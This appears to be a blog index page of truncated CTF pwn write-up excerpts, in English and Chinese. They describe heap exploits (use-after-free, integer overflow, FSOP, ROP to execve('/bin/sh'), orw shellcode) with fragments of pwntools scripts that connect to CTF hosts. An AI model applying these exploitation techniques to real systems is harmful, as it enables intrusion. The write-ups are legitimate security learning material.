3R2X5VY98TXJ18TVZFO6JVXNIYXEE6PA1H BITCOIN

5th place packet-maker (3 solves) UAF in the unlink process of link list. It’s the unintended solution. Intended solution is exploiting the off-by-null vulnerability. 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136#!/usr/bin/python2from pwn impor ...

1st place〜^^ Heap Heap Heap (2 solves) We can bypass the check for memory_needed > heap_heap.top_size via integer overflow vulnerability of statement struct Node *node = heap_heap.top in function halloc. This can help us leak the memory address and do the next step of exploitation. After we leaked the base address, we can use the integer overflow vulnerability of statement struct Node *new_node = node->data + size to achieve arbitrary memory allocation the next time we allocate a node usi ...

1st place!! mixtpeailbc (4 solves) 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576#!/usr/bin/python2from pwn import *from base64 import b64encodedef write_reg(reg1, reg2, imm): code = p8(1) code += p8(reg1) code += p8(reg2) code += p8(imm) return codedef load_reg(reg1, reg2, imm): code = p8(36) code += p8(reg1) code += p8(reg2) code += p8(imm) return codedef overwrite(re ...

3rd place CScript (4 solves) There is a UAF vulnerability when we assign a value to a variable using + statement. We can achieve an arbitrary code execution in the Print function by exploit the UAF vulnerability. At last, we just need to build our ROP chain and find a gadget that can trigger a stack pivot to execute execve("/bin/sh", 0, 0) 12345678910111213141516171819202122232425262728293031323334from pwn import *io = remote('cscript.wolvctf.io', 1337)context.bits = 64ru ...

4th place Flag Roulette Malloc a mmap chunk to change the _IO_write_ptr of _IO_2_1_stdout_ to leak the libc address Malloc another mmap chunk to change the _IO_buf_end of _IO_2_1_stdin_ so that we can overwrite the data on _IO_2_1_stdout_ in the next input FSOP 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081from pwn import *io = remote('worker03.gcc-ctf.com', 14964)context.bits ...

Some records of the challenges I have completed on Root Me. App - System ELF x64 - Advanced Heap Exploitation - Heap Leakless & Fortified (135 pts) Exploit the UAF vulnerability to create a fake unsortedbin chunk by modify the size of a chunk. Using the residual data of the unsortedbin chunk to collide the address of _IO_2_1_stdout_ . Modify the last bit of _IO_write_base to \x08 so that we can leak the libc address. Hijack the _IO_write_base to environ then we can leak the stack address. No ...

The vulnerability is in this part, we can bypass the if statement by integer overflow. Therefore, we are able to achieve out-of-bounds writing in the heap area. Step 1, leak the heap address. The vector of template class will allocate for twice the current memory size when the current memory is not enough. In the first two times, it will ask for 8 bytes and 16 bytes of memory from the heap allocator, which will return a chunk of size 0x20(In the following text, we refer to them as chunk a and c ...

摸了两道PWN就下号补作业去了（悲 converter2 c32rtomb 函数若传入的的UTF-32字符非法会返回-1，利用这点可以使指针指向数组负下标的位置。往 utf32_hexstr[3] 的尾部写一组UTF-32字符的数据，使其解析 utf32_hexstr[3] 时解析多一组数据，在后续 printf 时就能将flag带出来 123456789101112131415161718192021222324252627282930#!/usr/bin/python2from pwn import *# io = process('./chall')io = remote('34.146.195.242', 40004)ru = lambda x : io.recvuntil(x, drop = True)sa = lambda a, b : io.sendafter(a, b)sla = lambda a, b : io.sendlineafte ...

4th place 总共5道PWN，上号的时候队里的师傅已经出了1道了，然后我把剩下的4道出了 Great Expectations 读入浮点数部分写rbp，然后栈迁移+ret2libc 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364#!/usr/bin/python2from pwn import *context.binary = 'chall'libc = ELF('libc.so.6', checksec = False)sa = lambda a, b : io.sendafter(a, b)sla = lambda a, b : io.sendlineafter(a, b)ia = lambda : io.interactive()uu64 ...

lost-in-space (11 solves) index为200的页没有被mprotect调整权限，syscall指令被沙箱限制在这个页内执行，编写shellcode搜索出这个地址即可 因为是在不规则图（存在两条有向边指向同一个点的情况和环之类的）内搜索，直接进行 深搜/广搜 的效率会很低并且有可能会出现死循环（一直在一个环内的点循环搜索），所以在搜索过的页面上做个标记可以提高成功率，但比赛时懒得写了，直接广搜多跑几次也能通（ 还有就是最后在搜索出地址可以执行syscall后，直接执行 execve("/bin/sh", 0, 0) 会崩溃（猜测原因是程序内munmap掉了太多地址，本来合法的地址也变成了非法，sh进程里对这些munmap的非法地址进行了读写操作导致崩溃）。后面换成orw的shellcode就能正常读取flag了 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626 ...